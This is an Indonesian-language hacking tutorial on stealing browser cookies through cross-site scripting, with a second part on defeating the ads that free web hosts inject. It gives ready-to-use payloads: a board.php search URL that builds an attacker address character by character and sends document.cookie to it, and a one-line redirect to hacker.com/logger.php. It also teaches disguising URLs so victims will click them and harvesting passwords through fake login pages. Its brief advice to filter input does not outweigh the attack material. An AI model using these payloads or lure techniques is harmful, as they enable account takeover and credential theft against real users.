sERI 3 JAVA SCRIPT

JAVASCRIPT

Jasakom - Melanjutkan artikel sebelumnya, kali ini kita akan melihat sisi lain dari cookie yang sangat berbahaya ketika cookie bisa dicuri.

Catatan: Untuk melakukan hal ini Anda membutuhkan sedikit dari pengetahuan javascript tingkat lanjut, dan beberapa script sisi server seperti perl/php/asp.

Pencurian cookies dapat menjadi masalah serius bagi banyak situs. Seluruhnya tergantung pada bagaimana suatu situs mengeset keamanannya. Jika suatu situs hanya menggunakan cookies untuk mengidentifikasi user, maka tentu saja sangat rentan. Jika anda membutuhkan login kemudian seringkali tanpa kecuali mencoba dan mencuri cookies.   Dengan catatan, tentunya username dan password yang tersimpan dalam cookie dan tidak terenkripsi. Terkadang anda bahkan dapat mengakses tanpa login.  Kita akan mengambil contoh pada betapa rentannya situs http://neworder.box.sk saat kita mencuri beberapa tutorial LI, meskipun mereka tidak rentan akan hal ini karena anda harus login ke situsnya dan password user tidak ada dalam cookie. (silakan dilihat jika mereka mencuri suatu tutorial yang menjelaskan bagaimana mengeksploit sebuah hole dalam dari script mereka. Bagaimana kita akan mengeksploitasi bug ini adalah sederhana saja kok. Tinggal ketik ini pada browser http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new

Apa sich kelemahan script ini? Tidak meloloskan karakter terinput yang dicetak ke halaman. Saya katakan pada anda tentang meloloskan karakter adalah penting.  Script tersebut malah membiarkan sebuah tag sederhana
 untuk menghentikan javascript.
Jadi hal pertama yang harus kita lakukan adalah menguji dan melihat bagaimana berbagai karakter (jika saja) tidak diloloskan untuk kita gunakan. Setelah memeriksa berbagai karakter berikut ini: ' " ; | < > / dan % kita menemukan bahwa mereka dapat meloloskan karakter ' dan ". Jika tidak, kita akan mengeksploit script php-nya dan memiliki kendali penuh atas situs. Saya akan memberikan sedikit trik yang dalam satu detik dimana kita mampu mendaptkan javascript untuk mencetak ' dan ". Namun untuk saat ini kita harus menghentikan tag
. Jadi kita akhiri
dengan tag 
kemudian memasukkan berbagai jagascript yang kita kehendaki.

Pada paragraf pertama, telah saya katakan bahwa javascript sangatlah aman, karena tidak dapat dibaca-tulis file apapun pada hard drive user selain cookies. Disinilah kita akan memanfaatkan javascript untuk membaca cookie user NewOrder dan kemudian menggunakan javascript untuk mengirimkan ke mereka suatu cgi script dimana kita me-log cookie mereka ke sebuah file teks. Setelah ini kita memeriksa log dari script cgi dan menyimpan cookie yang tetap terpelihara oleh browser. Atau, kita bisa mendapatkan username dan password dari cookie dan login ke situs NewOrder (NewOrder tidak menyimpan password user ke dalam cookie).

Jadi sekarang untuk mencetak javascript yang akan mencuri cookie tersebut. Apa yang harus kita lakukan adalah menggunakan script yang mencetak karakter yang tidak luput ke halaman yang seolah-olah javascript yang sebenarnya pada situs tersebut. Jadi kita dapat melihat dan mengedit cookie user. Terdapat dua masalah utama yang harus ktia atasi. Pertama kita ingin mencetak suatu string tana menggunakan ' dan " sewaktu script php situs neworder meloloskan karakter tersebut. Bagaimana kita melakukan hal ini adalah dengan menggunakan javascript yang tidak membutuhkan ' atau " dan mencetak berbagai karakternya. Berikut ini adalah satu cara untuk melakukannya.


Kita membutuhkan %2B sebagai ganti +, karena + menjadi sebuah spasi saat anda jadikan script. Mungkin ada cara yang lebih mudah melakukan hal ini selain menggunakan fromCharCode,  entahlah =). 0x0068 adalah ascii untuk h.  74 untuk t.. (Anda dapat menggunakan grafik ascii dari situs http://www.elfqrin.com/docs/hakref/ascii_table.html ):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e 2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=. 63=c 67=g 69=i 3F=? Dengan kata lain buatlah var u ke string http://site.com/a.cgi?

Baiklah, jadi kita telah mendapatkan suatu string dalam sebuah variabel tanpa menggunakan ' atau ". var u = 'http://site.com/a.cgi?'; akan menjadi sama hanya jika script tidak terfilter pada ' dan ". Sekarang setelah mendapatkan string apa selanjutnya yang akan kita lakukan? hmm.. apa yang kita coba lakukan adalah mendapatkan cookie dalam sebuah string dan kemudian mengirimnya ke script cgi yang me-log apa yang ada dalam cookie. document.cookie adalah cookie untuk situs tersebut. Jika terdapat lebih dari satu cookie, maka anda harus menggunakan sedikit trik berikut ini. Cobalah halaman ini untuk belajar bagaimana menangani banyak cookie. Sekarang kita ingin menambahkan cookie ke akhir url tersebut, jadi:
u %2B= document.cookie;

Ouw! variabel u kita sekarang berupa http://site.com/a.cgi?user_s_cookie (namun user_s_cookie adalah nilai aktual dari cookie mereka). Jadi sekarang kita membuat javascript yang mengarahkan user ke url.document.location.replace(u);

Hal ini akan mengirim mereka ke var u kita, dimana a.cqi akan berubah menjadi suatu script cgi yang hanya me-log apapun yagn di input ke suatu database. Teknik lain untuk me-log cookie mereka adalah dengan menaruh sesuatu  seperti ini:

/(document.cookie)"> Tapi sewaktu filter script ' dan " akan menjadi sebuah url panjang untuk menaruh fromCharCode pada setiap karakter... pula, anda harus memiliki akses untuk me-log situs tersebut dengan tujuan memeriksa apakah file-file yang diminta dari direktori 'somedir'.

Seluruh teknik pencurian cookie membutuhkan beberapa jenis script di situs anda untuk me-log cookie sewaktu dikirim sebagai sebuah url.

Sekali anda memiliki cookie user terdapat dua hal yang perlu diperhatikan. Adakalanya situs yang menaruh username dan passwordnya di dalam cookie. Dalam kasus ini anda hanya me-log ke situs dengan hal tersebut. Beberapa situs lain hanya menggunakan cookie sederhana untuk keperluan otentikasi user. Tanpa meminta login.

Sebagai contoh www.geocities.com, jika anda mendapatkan sebuah 404 error, akan tercetak pada url seperti ini:

now if you have a cookie of a geocities member you can go to www.geocities.com and you will automatically be logged in.  From there you have full control over their account.

Namun geocities melakukan beberapa hal untuk menghentikan ini. Mereka mengarahkan websitenya ke http://geocities.yahoo.com .. jadi cookie user adalah sebuah cookie yahoo yang sebenarnya ;( Jika anda mencoba trik yang sama dimana anda mendapatkan file 404 pada yahoo yang tidak akan mencetak karakter < dan >. Namun jika anda menemukan suatu script pada yahoo yang tercetak < dan > anda dapat dengan mudah melakukan hal ini. Dan terdapat script pada yahoo yang rentan terhadap Cross Site Scripting, beberapa kasus telah dilaporkan ke milis buqtraq dan sayalah yang menemukan salah satunya.

Jadi bagaimana anda akan mendapatkan user yang mengunjungi url ini? cobalah sesuatu seperti ...

sumber untuk link pemain di www.redlite.com ini:


notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
and
onMouseOut="window.status='';return true"

Pada akhirnya ... ini untuk menipu user agar berpikir bahwa ada link utama disuatu tempat lainnya. Sekali lagi, menggunakan javascript untuk memanipulasi apa yang user lihat untuk mengelabuinya.

Script lainnya pada mesin edge yang rentan terhadap cross site scripting adalah board.php, berikut ini contoh eksploitasinya

http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0

Jadi bagaimana seorang coder menghentikan rentannya serangan ini? Saya katakan jangan pernah mencetak data yang diinput user kembali ke user. juga filter keluar <, >, dan lindugi semua url dengan encoding sebelum memfilter input. Saya sudah menemukan suatu cara untuk mencuri cookie dalam ikonboard lama menggunakan profile.cgi, meskipun tidak terlalu besar jumlahnya sewaktu terjadi celah keamanan yang serius pada ikonboard. Hal ini dikarenakan teknik pemrograman yang buruk yaitu mencetak input yang tidak difilterisasi. Sekarang ikonboard sudah tidak menggunakan profile.cgi, tidak mencetak dapat yang diinput ke layar dan memfilter data. Biasanya script webmail sangat rentan terhadap cross site scripting.. dan adalah benar sebuah kerentanan terjadi pada script alais-mail nya tim solution script yang saya temukan setahun lalu.

Beberapa masalah lain dengan javascript dan pencurian cookie:

http://www.peacefire.org/security/hmattach/ -  Sebuah eksploitasi terhadap Hotmail.  Saat hotmail tidak memfilter javascript dan diperbolehkannya lampiran .html untuk ditampilkan tanpa di download.

http://www.securityspace.com/exploit/exploit_1b.html

http://www.peacefire.org/security/iecookies/ - Pembukaan cookie jar, pembuka remote cookie. Menggunakan %2F dimaksudkan untuk / membuat IE menganggap bahwa itu adalah suatu situs.

http://homepages.paradise.net.nz/~glineham/cookiemonster.html

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp - Script aktif sebenarnya, bukannya javascript.

Kemudian terdapat artikel mengenai :// dan membaca isi file mengenai rentannya IE, yang baru dilaporkan ke milis buqtraq.. Saya merencanakan untuk mendiskusikan secara lebih detil saat mengupdate tutorial ini.

Banyak orang mengatakan kepada saya, "Tapi tak seorang pun menunjukkan gelagat akan meng-klik link yang terdapat javascript untuk mencuri cookie" ini memang benar. Saat url sederhana seperti

http://site.com/vulnscript.cgi? document.location.replace('http://hacker.com/logger.php?' + document.cookie);

Itulah mengapa kita ingin mengelabui mereka agar menganggap url tidaklah berbahaya. Berikut ini satu cara:

Teknik mengaburkan url:

Satu cara mengelabui user untuk meng-klik link yang mereka pikir terhubung ke tempat lain adalah menggunakan trik onmouseover, membuat url terlihat seolah-olah terhubung ke suatu tempat lain. Tentu saja anda tidak dapat menggunakan ini saat menggunakan protokol yang tidak mendukung html atau yang dilengkapi blok javascript dan onmouseover. Jadi maksud dari http://site.com anda mempunyai localhost http://127.0.0.1 mungkin tidak menolong banyak tentang bagaimana kita menggunakan trik ini. Saat browser login ke direktori .htaccess, mereka dapat saja menggunakan sintak berikut ini:

http://username:password@site.com

Anda lihat mengapa hal ini sangatlah penting. Tanpa password anda dapat memiliki sesuatu seperti :

http://username@site.com

dan akan bekerja dengan baik. Dengan mencoba login ke site.com melalui username = 'username' dan tanpa password. Sekarang apa yang terjadi bila disana tidak terdapat file .htaccess? maka tidak menjadi masalah apa yang username dan password masukkan, kemudian me-load halaman secara normal. Jadi sesuatu seperti ini dapat saja berupa:

http://microsoft.com/site/dir/helpdesk.asp@site.com

Anda lihat bagaimana hal ini biasa digunakan agar orang meng-klik link dan berpikir keterangan lainnya disuatu tempat? bahkan jika dalam bentuk plain text sudah banyak orang percaya bahwa link tersebut milik situs microsoft.com.

Ada banyak cara yang berbeda untuk "mengaburkan" url dari user untuk menolong anda menipu mereka. Salah satu diantaranya melibatkan peng-konversi an alamat ip ke persamaan decimal. Saya tidak akan menutupi hal ini, namun terdapat banyak tutorial lain di internet dimana anda dapat mempelajari hal ini. Saya sekedar membiarkan anda menggunakan script ini untuk secara otomatis meng-konversi alamat ip ke nilai decimal.

IPa IPb IPc IPd =

Sekarang gunakan ini yang dimaksudkan dari site.com dan anda akan mendapatkan sesuatu seperti:

http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F [menyisipkan teknik jahat javascript url ter-encode disini]

Sekarang anda tidak melihat sesuatu seperti http://site.com/a.cgi? (ini teknik jahat asli javascript)

yang akan menjadi sangat aman untuk user mengatakan apa yang harus dilakukan. Mari kita melampaui langkah pertama sekali waktu, sekedar meyakinkan anda mendapatkannya. Pertama buatlah berbagai nama situs (tidak mesti url yang valid)

http://aol.com/scripts/userid.jsp?

tambahkan karakter @ ke bagian akhirnya sehingga menjadi:

http://aol.com/scripts/userid.jsp?@

maka alamat ip anda dari localhost dalam form decimal adalah:

http://aol.com/scripts/userid.jsp?@3639550308

kemudian selanjutnya dari path pada url yang ter-encoding adalah:

http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F

termasuk encode url javascript dan menaruhnya ke bagian akhir. Hal ini hanyalah satu metode dari mengaburkan url, masih banyak teknik lainnya.

sISI LAIN BELAJAR JAVASCRIPT

Jasakom - Javascript dikenal sebagai bahasa script sisi klien yang diinterpretasikan oleh browser. Bahasa ini sering digunakan untuk membangun halaman web yang dinamis yang dapat berubah dan melakukan..DUMPLING


Artikel ini ditulis oleh seorang hacker bernama b0iler, ditulis bukan untuk mengajari anda menjadi pencuri, namun sebagai bahan pertimbangan dari artikel saya mengenai pencegahan serangan terhadap cookie user:

Berikut ini ringkasan dari artikelnya:

........................

1. Memutus Banner dan membunuh Frame
-------------------------------------------------------

Saya katakan memutus banner, adalah saat anda menggunakan javascript (atau tag lainnya) yang tidak di render oleh browser sama halnya dengan tag html biasa untuk mendapatkan popup banner. Biasa dilakukan secara otomatis oleh webhosting gratis pada halaman web anda. Ide dasar ini adalah memiliki tag yang tidak dirender sebagai html sebenarnya sebelum html dari webhosting tersebut menambahkan banner mereka begitu browser user tidak menemukan banner. Hal yang nyata adalah satu kunci hal yang anda ingin temukan dalam teknik membunuh banner tersebut. Inilah apa yang tag situs gunakan sebagai suatu "kunci". Apa yang saya maksudkan dengan hal ini adalah apakah banner yang mereka tambahkan datang sebelum atau sesudah? Coba perhatikan yang skema HTML yang umum dibuat dibawah ini. dibawah ini.


<html>
<!-script yang ditulis -->
<body>
text

Kemudian saat mengupload halaman dan menampilkannya pada browser. Lihat kode sumber dari halaman dan cari dimana banner situs tersebut ditambahkan. Jika datang sesudah tag dan sebelum tag kemudian anda ingin melihat apakah ditambahkan sebelum dan sesudah <!-- script yang ditulis --> yang ada diantara keduanya. Jika ditambahkan sebelum, maka tag adalah tag "kunci" (keytag) yang mereka tambahkan banner sesudahnya. Sedangkan bila dibawah <!-- script yang ditulis --> maka ketahuilah bahwa keytag ditambahkan setelah tag

Nah begitu kita ketahui dimana mereka menambahkan html banner, apa yang kita lakukan untuk menghentikan proses otomatis tersebut? Kita coba  membuat sebuah tag "palsu" dan berharap banner html ditambahkan kesana. Kemudian gunakan javascript untuk mencetak tag asli. Kita dapat melakukan beberapa hal, seperti script dibawah ini:

Dasar untuk menghentikannya.


<noscript>
<keytag>   -tag palsu. Sebelum/sesudah tag ini dimana banner situs ditambahkan
<keytag>   -tag asli


<script> ,
<keytag>   -tag asli.

pencetakan tag dengan javascript - satu hal yang telah dipikirkan oleh para ahli web dan dapat bekerja dengan baik, jika anda mempunyai masalah saat anda menaruh keytag asli kemudian mencoba menggunakan javascript begitu situs bahkan tidak menganggapnya sebagai keytag. Anda mendapat javascript untuk mencetak tag satu huruf setiap kali.


-->
<style>
<keytag>   -tag palsu. Sebelum/sesudah tag ini dimana banner situs ditambahkan.

Jika semuanya bekerja dengan baik, semestinya halaman situs anda sudah terbebsa dari popup dan banner flash. Jika tidak saya harap anda harus "bermain-main" dengan memodifikasi javascript yang sudah ada. Setiap webhosting gratis tentunya memiliki keytag dan metode yang berbeda dalam menambah banner. Saya tidak dapat mencoba keseluruhan banner yang ada yang mencobanya.

Saya memutuskan untuk memberikan contoh sebenarnya dari situs gratis yang menambahkan iklan popup atau banner ke seluruh halaman yang anda miliki. Saya akan menggunakan webhosting angelfire. Perlu di ingat, bahwa webhosting tersebut dapat merubah teknik penambahan banner mereka setiap waktu. Jadi script dibawah ini mungkin saja tidak bekerja sebagaimana mestinya. Karena hal ini melanggar TOS (Terms of Service) hostingan tersebut, dan berakibat ditutupnya situs anda tanpa pemberitahuan. Disarankan untuk selalu memback-up data situs Anda ke hard disk OK?


angelfire

<html>
<head>
<title>testing
<body>

-->

kode html yang biasa anda tulis


sebagaimana yang anda lihat, angelfire menaruh iklan mereka tepat setelah tag . Mereka semua memproteksi kita dari teknik menghilangkannya yaitu
. Jadi, kita dapat menaruh sesuatu seperti ini untuk menggagalkannya.

<style>
<body>

<body>

Begitu server angelfire akan menambahkan javascript untuk iklan mereka setelah tag .  Menaruh iklannya setelah . Artinya bahwa browser user akan menganggap bahwa dan iklan angelfire adalah css (cascading style sheet).. yang ternyata adalah tag

Adapun yang script ini lakukan adalah memeriksa apakah halaman aktif tidak berada di atas frame, jika tidak maka script akan menaruhnya sebagai top frame, menghapus frame lain dari window browser.



2. Memperoleh Script dengan Filter Javascript
-----------------------------------------------------------

Saat anda mengisi info ke sebuah buku tamu. Data isian tersebut akan ditempatkan pada halaman utama buku tamu. Dan kapan saja, siapa saja yang sudah mengunjungi halaman tersebut, kita ingin data mereka dikirim ke http://www.lameindustries.org. Kita akan memasukkan script ini ke buku tamu:


Terkadang saat anda ingin menggunakan javascript, terdapat beberapa form filter yang akan menghentikan tag

Bagaimana saya mengetahui apa yang nilai hex tersebut lakukan? Saya hanya memeriksa sebuah grafik ascii dan menambahkan "&" sebelum angka. Sebuah grafik ascii dapat dilihat di situs www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml

Ada beberapa situasi lain dimana javascript dapat digunakan. Jika anda dapat menebak filter pada email user, anda dapat menggunakan keterampilan men-spoofing email untuk mengirimkan suatu email dari seseorang yang mereka percaya. Jika mereka membukanya anda dapat memiliki email langsung mereka ke sebuah halaman yang menampilkan suatu pesan seperti ini "session timed out, please log in again" dan setelah form tersebut dikirimkan ke script cgi yang akan me-log nya. Hal ini bekerja untuk sebagian kecil orang, tapi cukup bernilai suatu saat.

Mendapatkan dengan filter javascript dapat memandu anda untuk mendapatkan cookies seperti forum, shopping cart, situs dan mengarahkan user ke situs pilihan anda sendiri. Dimanapun ada input yang ditampilkan pada suatu halaman dimana orang lain mengunjunginya disana ada seseorang yang menggunakan javascript untuk mencuri informasi. Kenyataannya hingga detik artikel ini diturunkan, telah ditemukan bahwa lycos dan search engine lainnya tergolong vulnerable untuk javascript dalam mendeskripsikan website dan nama-nama, baca artikel di www.slashdot.org untuk informasi lanjut. Hal ini menjamin 100% click untuk berbagai pencarian situs anda jalankan.

Dibawah ini terdapat sebuah cert advisory concerning insertion of script (javascript, vbscript, dll..) yang dimasukkan ke dalam script:

http://www.cert.org/advisories/CA-2000-02.html

Update:
Sudah terdapat advisory (nasehat teknis) baru untuk hotmail dan situs lain yang menggunakan filter javascript. Permasalahan dalam css dan penggunaan tag . Sewaktu code berikut ini digunakan untuk me-link javascript akan di eksekusi, terjadilah kemungkinan pencurian cookies, info atau mengarahkan user ke sebuah halaman login palsu.


link yang diletakkan pada dapat berarti satu hal. Tentu saja situs Hotmail telah dipatch sehari setelah laporan mengenai terjadinya Cross Site Scripting, namun hal tersebut menunjukkan bahwa Hotmail tidaklah 100% aman dan masin terdapat beberapa celah keamanan yang suatu saat dapat mengambil script tereksekusi. Juga webmail lainnya, buku tamu, forum diskusi, dsb... mungkin sangat rentan akan hal ini. Anda dapat menggunakan exploit hotmail yang lama dan beberapa script lainnya yang menginjinkan input dan mencetaknya dalam bentuk file .html. Saya menemukan celah keamanan ini dalam sebuah script di situs www.cyberarmy.com pada fasilitas webmail mereka. Saya tinggal melakukan ini : <script type="javascript">  dan mengarahkan user ke sebuah login palsu. Sewaktu mereka login, username dan password mereka dikirim ke sebuah script yang menulis informasi mereka ke sebuah database dan mereka login ke script webmail asli kembali. Script yang dibuat  oleh tim solusionscripts telah berhasil mengatasi hal ini. Tapi ini pun masih rentan.

Ada catatan bahwa field input text biasa bukan hanya satu-satunya cara untuk memasukkan data ke suatu script. Menyembunyikan fields dan sekelompok variabel  juga terkadang sangat rentan. Beberapa script akan memfilter seluruh field text, namun tidak memfilter field yang hidden, hal ini mengijinkan anda untuk memasukkan javascript atau teknik jahat lainnya.  Saya tidak akan berbicara banyak mengenai hal itu, saat seseorang membutuhkan keseluruhan tutorial dan kerena menulis javascript bukanlah hal pertama yang akan anda coba untuk mengekploit situs tersebut. Sekelompok variabel yang anda dapat exploit biasanya terkait satu sama lainnya atau disebut user-agent, ketika pemeliharaan menjadi hanya satu orang yang menulis ke sebuah file, mereka setidaknya telah memfilter input (menurut pengalaman saya). Sungguh mudah untuk menemukan cara memasukkan javascript jika anda mendapat potongan script tersebut. Terdapat dua cara mudah untuk melakukan hal ini, Pertama, dengan melihat apakah script tersebut bersifat open source, kemudian download dan perhatikan kelemahan kode tersebut. Kedua, mencari script/exploit yang memungkinkan anda melihat sumber script lainnya. Lakukan beberapa penelitian pada exploit lainnya dengan script lain pula (atau pada webservernya sendiri).




-->